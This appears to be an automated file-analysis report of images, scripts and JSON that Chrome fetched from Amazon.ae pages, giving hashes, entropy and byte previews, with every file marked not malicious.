                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......=......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:FC03975124CB11EFA30E8F55AA993B0A" xmpMM:InstanceID="xmp.iid:FC03975024CB11EFA30E8F55AA993B0A" xmp:CreatorTool="Adobe Photoshop 2024 Windows"> <xmpMM:DerivedFrom stRef:instanceID="2AD725D48FD3018F515EAE113945F37E" stRef:documentID="2AD725D48FD3018F515EAE113945F37E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2459
                                                                                                                                                                                                        Entropy (8bit):7.773202505765292
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rsVH4QFB7ZGr+aSkce3P7iVAJ1gt0KlMO1VAO/87RTGQT42H6Lp:TDVYeVGr+6OeJ1cr1SegRP4CG
                                                                                                                                                                                                        MD5:9ACFC70C73C81EDF49C053BD561E457E
                                                                                                                                                                                                        SHA1:39FF0ED0EA662B9BD0DF215C03BED98BC0939FDB
                                                                                                                                                                                                        SHA-256:AF51AA74C20F9BA123782B6061B655E2BA41C1B8987FA7A79167DE344859B757
                                                                                                                                                                                                        SHA-512:C6A5FE987DE1387E9F4C286A9D1AD4C0E3E68722E0A2DF6F404E031B4369CFEDC52EB88E806D6541C600C5DA938628C593E1DE17166822A72E4686BC4CF6BB9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1"2AQ....3BUaqrs...4Rb...t....5CEc.............................................!"1..............?...D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.E..VB..#...K.....IA..........b..:.Os.R....$..&..v.c....,.`..."y..'...:.Pi....[...o..o..kF.i...CbO....j%.%ff....7k.!.PA..W>f.w#..!UOy...N.,.;NA.._...\.1.....:JIo..{.]L ;.k.A... ""." "/...N........%EC.q......>_..7.|..C!......s.LNj..R....f`O....Q.Y-C...!.H........ .,.j.m.KA[..^B.......G6.l...U]..AS,...2`.......h.n..$q..W..B......7,`;.u....Z`ig*L....6V...h.C./..~.U...3.xV7..Q...p....y5.(.O..J_..$.c'...*..e.d4..f...#......w@.A..i'...(.l..C{N.$a...b..e......%..`...nL..k...A.... a./..:.Tr...w.,-y.U3...C..m....3*$...T../i..~R...c......#..'Q.W.$.>A..rm...:.6.W..ohT5t.../h......K..G.?...............Zu..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 134x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10747
                                                                                                                                                                                                        Entropy (8bit):7.963460359690359
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ZHKcyFob3gggMxcIKE2cdJ/sUyzAWWOLPAz+5+Euum9Uu6JGALDEkxN3:ryFobQmcIKEJBy8WBjAz+5lRFuQFN3
                                                                                                                                                                                                        MD5:89B814F71597E4227DD46FFAA2217319
                                                                                                                                                                                                        SHA1:C04AFADE270EFC23BDF2EB5F797127310D904694
                                                                                                                                                                                                        SHA-256:0A49DD26D30224783661936ECF3CAA16A63089DAF7B1CFF085CC056925138BBC
                                                                                                                                                                                                        SHA-512:7ADFC7C5B683EB0376EDB45AE20047A539B746DB9DAD29AA2479564FA41FF504020B860F5B7F00A0C53B03DA20B33375E3A697F79BCA8E7CEF9E2DF6D4BF7A6D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1.A.2Q#3Baqu.......$4RTU.bs.......Cr..5.......c................................................!1.Qq...24ARa.."rs..S.....#3..............?..P.D.....A......uA./..b...;1..A.....A......q.;s%.{..vr8_.....T.....".....(=..S.h.i\"I............y...y..-.L.(...J..u.%.s...1..D."..#..;r....D.......3...4)K.5..........V.............E....:.N......{.'.....I.._..?.W."O..^.(...e.&Db.1...$......Q.t%)..a..`? G....+..'.a~v..!_.?..l.< ....*..xh a..e......tRt.o*?...#..J.v..!_.?...'.....I...!...O..QO..1......M..h..F<.....J.....\...Z....[.Af...>...hE....+..'.c1.........B...Y)C....$../...yG......#.x.<.-~a.<.....M[.E}~..._....K..5;z.........?j..dl.Q[5.7*....r....@...`.q.I.].T.].0....o.L.t...y..<U...0=..P}..+...N,..J5..o..;<M.....7..l.'....Fd+./.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2215
                                                                                                                                                                                                        Entropy (8bit):7.780080651712038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r1bmS1J7o9AQuSJ4KkxZjG97evR+z22pbK3PzcGCSdbbbbR:TmDsCQXJUjG97E+FhK3Pz7bbbbR
                                                                                                                                                                                                        MD5:6A20D8C3C1C584CBDBFD7BF6376F07B2
                                                                                                                                                                                                        SHA1:09ED213ED35E8553E1279F920A6BC2878F9010F7
                                                                                                                                                                                                        SHA-256:30DA63A92210E0B20817E57EAF2789A5B4DC9895703298A0083E52799C1B7338
                                                                                                                                                                                                        SHA-512:F735DE0A33BE1DEAD940B2B7A9F734E018D7189325EDD586CFB05603A0B9EB6C4E3132375C3AE29087259A7B7735790D50529F73A23D2FB6C9DCAD14E5E3BF4C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!.1A..2Qa."qr..BR..#3T.....%S..............................................1.A............?............../...<..1..s......1.LEZ.{G{.c.{.....F..^.......E9y.....5..N...[8.._.H.i..M./....W....&TSJ.b..F8=...}...............5..<X.?...]c.SI.E.=.6.'...U.a.9(.C\k+...l....D.q...m8=.;.3'.4.`..=LL9..B!.JJ(.A-...J.e..w1.......Q*k.~..k3..ANG./Y|..^......U......u.#Id}CK.`..j.v...%.e-... .....G...8...z..i.T...D.`..2&.......'2W....R.n....C/.I.V....m.v#.R.:..#.a*.5...R<.|.bf....l.VK.a.,OC5.... ..z7t{}B.....W..Ps|..,g.Q.1.../N..T........DNn..G...I.1..l..h.....f..$?..wo_.v..T.""." ""." *}.G...{=..*h..}.Hr`W.k....Ub.\.|,..6.`..n...!...s.I.N.z...v._..a..0...{3{.>2*#.l8q6 .P..I..y.#...hh.h.4..........}.,..[i.F.i._.-..\E.{FE.....U2.I....v@....6<...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11994
                                                                                                                                                                                                        Entropy (8bit):7.872940207714583
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Ghe5bwD7pCbKki/WPK0NS+NjEauPdPTDXa2jNW7v9/qnoDBMHMi:GWcpaRNjErtDg7Fqnodji
                                                                                                                                                                                                        MD5:FE3907394326B44B3FE29FD670C143FD
                                                                                                                                                                                                        SHA1:19577FE8F83C88D50676FDD98213120CECC6CAEC
                                                                                                                                                                                                        SHA-256:BA049DA37F6AD748B78F90F7E367307B97DC4A89C3013C0839579B68FA47B759
                                                                                                                                                                                                        SHA-512:A6305F39109B67E1C11CC97725DF8EE9913BD8837E0D66DD89C93C34AD985B5468299F76B4D44E028A58CC38404467EC40CC173ED5611EDA33FDFD078089FB3B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2.........................................................................................................................................................................yl..^.gme...^ZO.....................~a.>..4cc.e.m4eD.L"....xt.o)d.D..v.s................_.x)0....k-.55......[...1t....e....h...=...............)....#...UT.E..n...M.A..AE[Dd.b...............(...."z.U.V.;...H.:Q......m..E.`......................0K..P\.h.2.K!... ...2)...................j...3).'..USU...*.L....! ...29..............z.QqH...L..S !..H.-.i.c.=..s5n...(g..T.......8.^.e.yEYDdSij.......Q9&20..u,.E.d......3y..;~..s.k....,j.Pr.&..v[e>..+M..n...s{...P]....u...%..$..,..P..V......#..=!s...}.....U..{m#.Y.G..D.l.....k..A1...;..9.Y..sO.2..}l..Z.t......Y&...+....Z.(*h..SgW....t.j.Uqy.Z.......%..B.QV.z....%$..UB...>m:^4.t..S..YW
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 100 x 100
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15331
                                                                                                                                                                                                        Entropy (8bit):7.845249880729631
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:g8ozCbxjsv+KtKSbln83pocNAAGV4K9Lk5R:g8/bxjsvJKC83VAAGV4KhkL
                                                                                                                                                                                                        MD5:0E28DAF1A16F1C39C32DEC29F4084DDF
                                                                                                                                                                                                        SHA1:1AF74FE87992C48B734D5C68F8AB795E0E9E3759
                                                                                                                                                                                                        SHA-256:7AF9039026D259AA4649A5B1F3D6DADCE932241441A7CD899DB50E72283197E6
                                                                                                                                                                                                        SHA-512:1F2FBD5B32DCBB1B4EE9A151BD3D8ACA30919778320DBC856E6F6F18A8D3EC0D92596828A572D4DB9DDDE5346B0219EB91607651723700B0E56A97E530B76968
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-na.ssl-images-amazon.com/images/G/01/payments-portal/r1/loading-4x._CB338200758_.gif
                                                                                                                                                                                                        Preview:GIF89ad.d.........H..Y..................................(....r......z..h.......8.....................!..NETSCAPE2.0.....,....d.d.....'.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z....X.*.A p..&..b[#("..xN../..e.!.]..q..tcwvy.......)........x.......$.p.........................~Z....rs........kX.`...........W.......u......U.............S....@...{......a.(..J.W..sw..Z.!.wN&I.Xa =[.*.<P............B.8.4).A...).$A./..(...!.hJ...I...P_$.........y#....*..........x..g..g...K...p...................p.A....N...G....6......x;.x.9.`.D,.>.Y. .\.m.........x....B70..7.!..K.~:+....k..........`$.W......<<....XH.^......N.....u.@...g...Y7....u...........q.A.a...a.~.U..hH\........,.....Q...`.A......<j._...h.D.....l...K6.A.JX@.6rpd.Xf..C0@......d.I.(6...h...er..o....x.5g.....?.)C......0 P..X.#.-0.g..6.i.n4.@..By...r.@..~....::.r.JB...*k...*..".k..z.....k...@...&.i.'..l..2....p,...J+-..2...N...`.....Tm.1E{...(...K/.....J{/./..(....p...P..#.0..7........k.....S..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1922)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):423055
                                                                                                                                                                                                        Entropy (8bit):5.746869127772581
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:uERrns7Gth0wXdoyl2O+zLwkGlp2Aql58L1SlKglC2xsng9aF:ugnsmh0wx2O+xGr2VlyL1SlKb28F
                                                                                                                                                                                                        MD5:FD271D08E98605649B63E1FD2A46A109
                                                                                                                                                                                                        SHA1:FDBC7E8BB168DE20047CCDA7646FF9F62F80A0C4
                                                                                                                                                                                                        SHA-256:4F3AE3BBC75BFF3EB7BD6444FFA91907B21A86ED41526193A0A88DD28644C694
                                                                                                                                                                                                        SHA-512:C5468D1D738E3424EFF00E773F7E570A26D5FD0855F4EDC248AA0F0F0DF6579C333520707892677F1653B2E7E443F0A483F0520768D21919E856F5B3B5B1937F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/service-worker.js
                                                                                                                                                                                                        Preview:(function(){self.getServiceWorkerGlobalClientConfigData=function(){try{return JSON.parse(decodeURIComponent("%7B%22deviceProperties%22:%7B%22appType%22:%22web%22,%22deviceType%22:%22desktop%22%7D,%22marketplaceProperties%22:%7B%22countryCode%22:%22ae%22,%22marketplaceName%22:%22Amazon.ae%22,%22obfuscatedMarketplaceId%22:%22A2VIGQ35RCS4UG%22%7D,%22namespaces%22:%7B%22in-latency%22:%7B%22lightsaber-web%22:%7B%22data%22:%7B%22clientEnabled%22:true%7D%7D,%22lightsaber-mshop%22:%7B%22data%22:%7B%22clientEnabled%22:false%7D%7D%7D,%22lightsaber-rule-levers%22:%7B%22bazaar-gateway-mshop-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22buyagain-mshop-android%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22cart-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22browsepage-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22search-mshop-android%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22detail-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4521
                                                                                                                                                                                                        Entropy (8bit):7.8120881867521925
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LUGuCloDgu088d96JMa7oV3wySlszcHsQVZY+oFqT5DV82:LUGudgndd0J17SyFMQVZYUr1
                                                                                                                                                                                                        MD5:EDBCD73DB073CECBD97B7A4A9B63286F
                                                                                                                                                                                                        SHA1:2F9FF0AAA3C47AEE01A17772FF56C736476CA5E2
                                                                                                                                                                                                        SHA-256:00225623C559C59037352A965875DE2865D043398AF152F76A36ACE7E2EE86FF
                                                                                                                                                                                                        SHA-512:78176D6580664DF74260E03485EE3A261677FF2A4F99EAF2729A6176FF3226B1E208432076CA9667F298EDA4641BCB403505697DB9A68EF3473AF492CC148E63
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........:.........................................................................b......A........;..*.7..h!J.=..=......3.4.T..a...z...d.ua......ZCo..z.&.-xTZ.j...D..i.......n,.e;....R.......T...............2Q(.e..o.]....oJ...k.......z.\f1<...]..;.".R...z.....Fq7.F..w$Q...A+...2.........-h.Z....6....v.v..lb.' ..@.R.z.9..y...q\...ez@...C.....k..|......%.F...s....|r.~C................T.............................!1...$%5AEU..&0equ."'4DFQRT..... @Prv.....6BVWa..............?.....j.6&..V8/....~.,.....5..--........Y..PZt..m........R.O......l..-S.G+.......SW.... .....B..n...m+P[M..!...........-........p.*..O~..<.O.@U'..}..1..1...f...;..dD..>.......5$.........l6..... ,F..P.$Z.n.._/..(.5....L...-.qC.c.p$......].gf.^..+....nN...p.fI?.....5X..:..j....=&..6m..Gy.]..s..",qC.<.a....P..1
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):51809
                                                                                                                                                                                                        Entropy (8bit):7.989973686790267
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:0B2O3FM0tBDTR9u06CRn2eJugbkfAg9/GOekNkVPr++NWfftYt0jGsTAn:0MOVMQH9wCd9JrPgpHehlKCWffagTS
                                                                                                                                                                                                        MD5:6F6711FD040C987E7F8281C04B8CE0F3
                                                                                                                                                                                                        SHA1:9F2DCFCA30E05941AC374CFA509BC88404564144
                                                                                                                                                                                                        SHA-256:6A0C7465560154A6BBF1F77A4E89AF7404D786C6E3EE4289BEF21B3FF5282DEC
                                                                                                                                                                                                        SHA-512:EAA5C03AB89EE04B6381C5BC64288C7A6A6DDB3B4A3893CC16F910622EE71DF19F21AA55C6FCA955ED8986C24851869A9F0E2718F3A02B86694B5DA07825B925
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_04_paper_en._CB568181090_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE........S..............U..T$:...V........................".=..O.....Q!8...M$7....%6......N$0?...(4B...3F...L....A.......0C...........*9..V.k...#....D...YFY..%5....s........f..L...(.~.K^........./.b...Q.o.8K.$6..x..].;P..>...........T.AT..X......L....O.....J.Yl.]........+2{2?.<..Re.W...E...T!7..../..O...(.x..E...2.l...."3....~..#......$u...4a...s!F.}..<G.9..mu}.....K......,4.S.;D.6.....`.>...Xak.........=FS...uz....@P...dm..%0dY..go....e..0.5D....,........|.Zb....,........?.2:sk......V..5o...P...................H..R..y...JS`OV.IQ........i.q.A.=.dlu...>.....@.I".1...=.....fw.1;J:.@...{.N......@m....b`.f......`....z.BH~..<X_....z..0{\X.....s.....:.r.mQ].......U.l/..n[.O...")WT.z...R.V..u....[><l?>..F.......s.N%k.^Z....z..n..-w.W.....5.....6:......#.9.L..... .IDATx..n....E.f".M...4.....Hs.@...n..`/..J.p....p.&H.*.p..H..@.;3.s.-{...K[.)..~...?.......c.x....1O=..r.?:6..a.._...>.........|..P..r.|..>~.c...|....x....3..a...9.....9}..S.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 132 x 235, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13199
                                                                                                                                                                                                        Entropy (8bit):7.954935066574483
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:rH0E+WSNeZU6PNg1A0KxVaF5bXXt7qYs9lcCHihS5WC9tEAxvVy4yK+ezneiTs4Q:rHpXSJSNg1A0KxC5jUDcvuLxvQlziLI
                                                                                                                                                                                                        MD5:4AB8824103871D92816E2A084A05949B
                                                                                                                                                                                                        SHA1:85C43DB1559578D308AE8CEE328CC4483352A649
                                                                                                                                                                                                        SHA-256:958E3858A8659187AD3BC8E723E0C6A1C2415C6AE40023B40CD0289D0E2DF366
                                                                                                                                                                                                        SHA-512:A5705C4177AC542244E6BA77BEDFC19BB69823B16206A1C086A2719DB9239222B8DAA0F808B6535BFCB479D0504C63E1597594D8FC2F9AE7DB03F0AE72242DE6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/x6ok$LYiGGUKJXl.png
                                                                                                                                                                                                        Preview:.PNG........IHDR...............>(....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b3e090dd-84c4-4674-9fe3-59f5a5bd6db7" xmpMM:DocumentID="xmp.did:AB1D71FA873C11E6A935C06C3689B1A4" xmpMM:InstanceID="xmp.iid:AB1D71F9873C11E6A935C06C3689B1A4" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f301801f-ea81-4562-919b-633c17b77694" stRef:documentID="adobe:docid:photoshop:9b6ca99e-cfa6-1179-9606-c490b53d51cf"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Z..k../.IDATx..}.x
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11474)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11547
                                                                                                                                                                                                        Entropy (8bit):5.662179970038899
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:rUsYwI08mI0kFoC2Z006u3QQOfUMw7whwuwgowgw0KjywPSCUkT9kC7Sm05vOhp0:rUsYwr8mI0vj006uHOfUMw7whwuwDwgR
                                                                                                                                                                                                        MD5:AE5F6E782A544151556463B969BFF19E
                                                                                                                                                                                                        SHA1:8F5B0B478E5189A5168E3E940F0C3DDF6B628E1C
                                                                                                                                                                                                        SHA-256:23EE80CFE4375317F68B69F0665CDE2DA74CFDD6BD32E020D98ED0A3E9367B78
                                                                                                                                                                                                        SHA-512:C4D989B39BCDA09B312AC27187DC6700D6259A5F1BFF950717411D7F34F8ED4CFEA9C0682F260065CD69EF4EBF7A378D3C75A6944DF1EF103E74E2E03A4D7959
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.discountWidgets=self.discountWidgets||[]).push([[532],{7925:(e,o,t)=>{t.d(o,{Z:()=>_});const _={root:"ButtonLink-module__root_eh2cgp8M2THLjamsgeRE"}},5700:(e,o,t)=>{t.d(o,{Z:()=>_});const _={message:"ConnectionProblem-module__message_JdHSKUuTcV1JaZ2wrCVD"}},7870:(e,o,t)=>{t.d(o,{Z:()=>_});const _={root:"ErrorGrid-module__root_OsEbvqDKCdYp7U_xun29"}},9570:(e,o,t)=>{t.d(o,{Z:()=>_});const _={container:"GridItem-module__container_PW2gdkwTj1GQzdwJjejN",remoteContentContainer:"GridItem-module__remoteContentContainer_ymiGkvMEWVEuR0ms2DVe",remoteContainerGuardrail:"GridItem-module__remoteContainerGuardrail_q1NHdQCmffOPWtLZ19zp",remoteContainerWrapper:"GridItem-module__remoteContainerWrapper_apJ1kx4QfqZeFXudPZ_a"}},1282:(e,o,t)=>{t.d(o,{Z:()=>_});const _={remoteContentContainer:"GridRow-module__remoteContentContainer_v6yj7EBU09SkoN9QQamg",container:"GridRow-module__container_q6XsDi4clqdE6jhYFSBW"}},4906:(e,o,t)=>{t.d(o,{Z:()=>_});const _={root:"LoadMore-module__root_weRWw3lb
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4780
                                                                                                                                                                                                        Entropy (8bit):5.124515922139478
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:IdNO4zHJcr3009EbtreSDOln0kl7y0uqYD40STfKAHSTfXAk4eKpU:IG4zpcr009EY+wn37yAk4fKAAXAk4zpU
                                                                                                                                                                                                        MD5:36B72D2A472B91159DB8C69ED0A4507A
                                                                                                                                                                                                        SHA1:43FE9506149B1C5881A416CF9B94E947B9071E9E
                                                                                                                                                                                                        SHA-256:81515AB91F12F3B6FC22C603082E09080A0F603D708DF6CF003635C72BEE0EB8
                                                                                                                                                                                                        SHA-512:7C0F862A09DA125C95E4E01AE69BE88D93A6C7643AEC5B82EC18B175269FF53A5068CFE162575324F44C2FD47332A8E44FB4B5CFE92AE32739579A9F48A94EB7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3JlZj1uYXZfbG9nbz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22slotName%22%3A%22right-2%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-right-2&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; top: 2px; right: 0px;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 173x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6096
                                                                                                                                                                                                        Entropy (8bit):7.920252042996531
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tpt9n8K5G0D6zfPOvxGiG7eMqfCzsXcmVEX5j6Pv3hsQ91zAUsUpuNN52d9XUpqy:H2K57DuPM7G7e/xpEX5j6X3hdFAUsU81
                                                                                                                                                                                                        MD5:E5EB296D49B15AFDFA6763F59FB3C38B
                                                                                                                                                                                                        SHA1:A4C0859E96E717F71101BF1FE4BF67C9C15BACF0
                                                                                                                                                                                                        SHA-256:D13C030C1CAF9D7E0FFDC5838A558D3BC5CE225141F1E27FA58C3770E2C9CB0C
                                                                                                                                                                                                        SHA-512:8A29CD6F78CAFA6828C923F2339CF089D65E9A53F3656A66A259F5FC0C93FA61B078BBB73370F78FE7905A983EBE89833C56D233F71D908549EB90410F6530FA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71-ANz0gizL._AC_SY200_.jpg
